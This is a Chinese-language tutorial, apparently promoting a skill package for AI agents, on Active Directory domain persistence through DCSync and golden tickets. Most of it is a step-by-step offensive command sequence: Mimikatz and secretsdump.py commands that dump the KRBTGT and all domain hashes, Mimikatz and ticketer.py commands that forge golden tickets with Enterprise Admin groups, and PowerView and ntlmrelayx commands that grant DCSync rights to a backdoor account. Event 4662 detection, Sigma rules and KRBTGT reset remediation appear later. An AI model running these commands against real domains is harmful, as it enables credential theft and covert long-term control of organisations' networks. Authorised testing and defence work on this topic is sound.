Anthropic-Cybersecurity-Skills 实战指南:利用 DCSync 与黄金票据实现 AD 域持久化 Anthropic-Cybersecurity-Skills 实战指南利用 DCSync 与黄金票据实现 AD 域持久化【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills导读本文以本仓库conducting-domain-persistence-with-dcsync技能包为核心系统讲解如何滥用 MS-DRSR 目录复制协议DS-Replication-Get-Changes / -All 扩展权限伪装域控提取 KRBTGT、域管理员与服务账户哈希进而伪造黄金票据实现长期域持久化。读完本文你将掌握 DCSync 攻击链的四个阶段、黄金票据完整生命周期、基于 PowerView / Mimikatz / Impacket 的完整命令序列以及基于 Event 4662/4624、复制 GUID 与 Sigma 规则的检测与修复方案。DCSync 攻击原理概述DCSync 是一种滥用 Microsoft Directory Replication Service Remote ProtocolMS-DRSR的攻击技术攻击者伪装成一台域控制器Domain ControllerDC向目标 DC 发起复制请求以获取密码数据。该技术由 Mimikatz 作者 Benjamin Delpy 与 Vincent Le Toux 提出其本质是滥用域根对象的两个扩展权限DS-Replication-Get-ChangesGUID1131f6aa-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes-AllGUID1131f6ad-9c07-11d1-f79f-00c04fc2dcd2任何拥有这些权限的主体用户或计算机账户都可以复制域内任意账户的密码哈希包括 KRBTGT 账户。拿到 KRBTGT 哈希后攻击者即可伪造黄金票据Golden Ticket获得近乎无限期的域访问能力。该技术对应 MITRE ATTCKT1003.006OS Credential Dumping: DCSync是 APT28Fancy Bear、APT29Cozy BearSolarWinds 供应链攻击、FIN6 与 Wizard SpiderRyuk 勒索软件等组织使用的关键后渗透技术。DCSync 攻击链核心工作流技能包的 references/workflows.md 将完整的 DCSync 域持久化过程划分为四个阶段1. Prerequisites前置条件 ├── Domain Admin 或拥有复制权限的账户 ├── 到域控的网络可达性TCP/135动态 RPC └── 工具MimikatzWindows或 secretsdump.pyLinux 2. Credential Extraction凭据提取 ├── 提取 KRBTGT 哈希黄金票据能力 ├── 提取 Administrator 哈希即时 DA 访问 ├── 提取全部域哈希完整转储 └── 提取服务账户哈希横向移动 3. Golden Ticket Persistence黄金票据持久化 ├── 使用 KRBTGT 哈希伪造黄金票据 ├── 设置任意用户、SID 与组成员关系 ├── 将票据导入当前会话 └── 访问域内任意资源 4. DCSync Rights Persistence复制权限持久化 ├── 在 AD 中创建低调账户 ├── 授予 DS-Replication-Get-Changes-All 权限 ├── 通过 ACL 枚举验证权限 └── 该账户可独立执行 DCSync四个阶段对应两种典型的持久化思路凭据型持久化通过 KRBTGT 伪造黄金票据与权限型持久化在 AD 中保留一个被授予复制权限的低调账户二者可以组合使用形成纵深持久化。黄金票据生命周期黄金票据的完整生命周期是理解其威胁与修复手段的关键workflows.md 给出了精炼的生命周期描述Creation创建: KRBTGT hash Domain SID → Golden Ticket默认 10 年有效期 Usage使用: 导入票据 → 访问域内任意服务 Survival存活: 可穿透普通密码重置除非对 KRBTGT 执行双重重置 Detection检测: 异常的 TGT 生命周期、不存在的用户、不可能的 SID Cleanup清除: 双重 KRBTGT 密码重置两次重置间隔需 10 小时以上黄金票据之所以黄金在于它是用 KRBTGT 账户哈希签名的而 KRBTGT 的密码在域内极少被轮换。只要 KRBTGT 哈希未更新攻击者伪造的票据就始终有效——这是它与普通凭据最大的差异它不依赖某个具体账户密码是否被修改。因此官方修复方案要求双重重置连续两次修改 KRBTGT 密码且两次之间间隔必须超过 10 小时Kerberos 复制延迟窗口否则旧哈希仍可能从其他复制伙伴处恢复。阶段一识别拥有 DCSync 权限的账户使用 PowerView 枚举复制权限Get-DomainObjectAcl -SearchBase DCdomain,DClocal -ResolveGUIDs | Where-Object { ($_.ObjectAceType -match Replicating) -and ($_.ActiveDirectoryRights -match ExtendedRight) } | Select-Object SecurityIdentifier, ObjectAceType使用 BloodHound Cypher 查询MATCH (u)-[:DCSync|GetChanges|GetChangesAll*1..]-(d:Domain) RETURN u.name, d.name使用 Impacket 检查findDelegation.py domain.local/user:Password123 -dc-ip 10.10.10.1默认拥有 DCSync 权限的主体无需额外配置即可提取哈希主体说明Domain Admins域管理员组成员Enterprise Admins林管理员组成员Domain Controllers 组域控计算机账户所在组DC 上的 SYSTEM域控本机系统账户阶段二DCSync 凭据提取MimikatzWindows# 提取指定账户KRBTGT 用于黄金票据 mimikatz.exe lsadump::dcsync /domain:domain.local /user:krbtgt # 提取域管理员 mimikatz.exe lsadump::dcsync /domain:domain.local /user:administrator # 转储全部域账户 mimikatz.exe lsadump::dcsync /domain:domain.local /all /csvImpacket secretsdump.pyLinux# 转储全部凭据 secretsdump.py domain.local/admin:Password12310.10.10.1 # 仅提取指定用户 secretsdump.py -just-dc-user krbtgt domain.local/admin:Password12310.10.10.1 # 仅提取 NTLM 哈希不含 Kerberos 密钥 secretsdump.py -just-dc-ntlm domain.local/admin:Password12310.10.10.1 # 使用 Kerberos 认证先获取 ccache 票据 export KRB5CCNAMEadmin.ccache secretsdump.py -k -no-pass domain.local/adminDC01.domain.local-just-dc-user与-just-dc-ntlm两个参数在实战中极为常用前者能以最小噪音定向提取 KRBTGT 哈希后者可跳过 Kerberos 密钥字段、显著减小转储体积与日志特征。阶段三黄金票据伪造Mimikatz 创建并注入黄金票据# 创建黄金票据并注入当前会话/ptt mimikatz.exe kerberos::golden /user:administrator /domain:domain.local \ /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \ /krbtgt:krbtgt_ntlm_hash /ptt # 创建带特定组成员关系的票据512Domain Admins, 513Domain Users, # 518Schema Admins, 519Enterprise Admins, 520Group Policy Creators mimikatz.exe kerberos::golden /user:fakeadmin /domain:domain.local \ /sid:S-1-5-21-XXXXXXXXXX \ /krbtgt:krbtgt_ntlm_hash \ /groups:512,513,518,519,520 /ptt注意/groups参数直接决定了票据内嵌的组成员关系——攻击者甚至可以伪造一个不存在的假管理员用户并为其赋予 Enterprise Admins 权限这正是检测层面不存在的用户 不可能的 SID组合特征出现的原因。Impacket ticketer.pyLinux# 创建黄金票据 ticketer.py -nthash krbtgt_ntlm_hash -domain-sid S-1-5-21-XXXXXXXXXX \ -domain domain.local administrator # 使用票据访问域控 export KRB5CCNAMEadministrator.ccache psexec.py -k -no-pass domain.local/administratorDC01.domain.local阶段四通过 DCSync 权限实现持久化除伪造票据外更隐蔽的持久化方式是直接在 AD 中保留一个拥有复制权限的受控账户PowerView 授予并验证 DCSync 权限# 为目标账户添加 DS-Replication-Get-Changes-All 权限 Add-DomainObjectAcl -TargetIdentity DCdomain,DClocal \ -PrincipalIdentity backdoor_user -Rights DCSync # 验证权限是否生效 Get-DomainObjectAcl -SearchBase DCdomain,DClocal -ResolveGUIDs | Where-Object { $_.SecurityIdentifier -match backdoor_user_SID }ntlmrelayx.py 自动化权限提升# 中继认证以添加 DCSync 权限 ntlmrelayx.py -t ldap://DC01.domain.local --escalate-user backdoor_user这种权限型持久化的优势在于受控账户可以随时重新执行 DCSync 提取哈希即使黄金票据被修复KRBTGT 双重重置也能卷土重来因此防御方必须同时审计复制权限 ACL。工具矩阵与关键哈希工具速查表工具用途平台MimikatzDCSync 提取、黄金票据创建Windowssecretsdump.py远程 DCSyncImpacketLinuxPythonticketer.py黄金票据创建ImpacketLinuxPythonPowerViewACL 枚举与修改WindowsPowerShellRubeusKerberos 票据操作Windows.NETntlmrelayx.py通过中继进行 DCSync 权限提升LinuxPython必须优先提取的哈希账户用途持久化价值krbtgt黄金票据创建无限期域访问Administrator直接 DA 访问即时特权访问服务账户横向移动跨域服务访问计算机账户白银票据创建服务级身份冒充检测签名与事件 ID检测指标对照表指标检测方法来自非 DC 来源的 DrsGetNCChanges RPC 调用网络监控检测来自异常 IP 的 DRSUAPI 流量含Replicating Directory ChangesGUID 的 Event 4662DC 上的 Windows 安全日志1131f6aa-/1131f6ad- GUID带黄金票据异常的 Event 4624登录事件不可能的 SID 或不存在的用户域根对象上的 ACL 修改Event 5136目录服务变更复制流量激增网络基线偏离监控关键 GUID用于精确匹配GUID权限1131f6aa-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes1131f6ad-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes-All89e95b76-444d-4c62-991a-0facbeda640cDS-Replication-Get-Changes-In-Filtered-Set这三个 GUID 是检测规则的核心匹配对象凡在非预期主体发起的复制操作中命中上述 GUID基本可以判定为 DCSync 行为。源码级实现DCSync 检测与哈希分析脚本技能包在 scripts/agent.py 中提供了基于ldap3与impacket的检测代理覆盖攻击链各阶段的可观测环节check_dcsync_permissions()以 NTLM 绑定 AD 后通过adminCount1筛选高特权用户枚举潜在 DCSync 权限持有者detect_dcsync_events()解析 Windows 安全事件日志 JSON对 Event 4662 的属性字段逐一匹配三个复制 GUID命中即标记为CRITICALgenerate_sigma_rule()自动生成可直接投入生产的 Sigma 检测规则其核心选择条件为EventID: 4662Properties contains复制 GUID并通过SubjectUserName|endswith: $过滤掉合法的域控计算机账户以$结尾——这正是区分正常复制与恶意 DCSync的关键过滤逻辑。运行方式pip install ldap3 impacket python skills/conducting-domain-persistence-with-dcsync/scripts/agent.py \ --server 10.10.10.1 --domain domain.local \ --username admin --password Password123 \ --log-file events.json --output report.json配套的 scripts/process.py 则用于解析secretsdump.py的输出文件自动识别 KRBTGT 与 Administrator 哈希、区分机器账户与用户账户、检测跨账户的 NTLM 哈希重用明文密码复用分析并生成包含持久化机会清单黄金票据 / 白银票据 / Pass-the-Hash / 离线破解的结构化报告python skills/conducting-domain-persistence-with-dcsync/scripts/process.py secretsdump_output.txt攻击报告模板与修复建议技能包在 assets/template.md 中提供了标准的 DCSync 攻击报告模板用于在授权测试中规范记录与交付包含四个板块目标域信息域 SID、DC 地址、攻击源账户、已提取凭据账户类型、NT 哈希、持久化价值、持久化机制状态黄金票据 / DCSync 权限 / 白银票据以及修复行动。其中修复部分的优先级排序如下修复动作优先级KRBTGT 密码双重重置两次间隔 10 小时以上Critical审计拥有复制权限的账户Critical启用 Event 4662 复制 GUID 日志记录High部署 DRSUAPI 流量监控High框架映射与威胁情报背景MITRE ATTCK 映射技术 ID名称战术T1003.006OS Credential Dumping: DCSync凭据获取T1558.001Steal or Forge Kerberos Tickets: Golden Ticket凭据获取T1222.001File and Directory Permissions Modification防御规避T1098Account Manipulation持久化T1078.002Valid Accounts: Domain Accounts持久化已知威胁组织使用情况APT28Fancy Bear利用 DCSync 进行凭据收割APT29Cozy BearSolarWinds 供应链攻击中使用 DCSyncFIN6金融犯罪组织Wizard SpiderRyuk 勒索软件运营。本技能在仓库的 MITRE ATTCK 覆盖体系中亦被明确收录根据 mappings/attack-navigator-layer.jsonT1003.006DCSync被 13 个技能引用T1558.001黄金票据被 7 个技能引用本技能均位列其中相关覆盖统计详见 mappings/mitre-attack/coverage-summary.md 与 ATTACK_COVERAGE.md。验证标准Checklist完成一次 DCSync 域持久化演练后应逐项核对以下验证点已枚举拥有 DCSync 权限的账户已通过 DCSync 提取 KRBTGT 哈希已成功转储全部域凭据黄金票据已伪造并通过 DA 访问验证若在范围内已建立 DCSync 权限持久化机制已使用黄金票据验证对域控的访问已记录哈希值与时间戳等证据已提供修复建议KRBTGT 双重重置、ACL 审计法律声明本技能仅用于授权的安全测试与教育目的。在未经书面授权的系统上使用属于违法行为可能触犯计算机欺诈相关法律。执行任何测试前请确保获得明确授权并仅在隔离的测试/实验环境中操作。【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考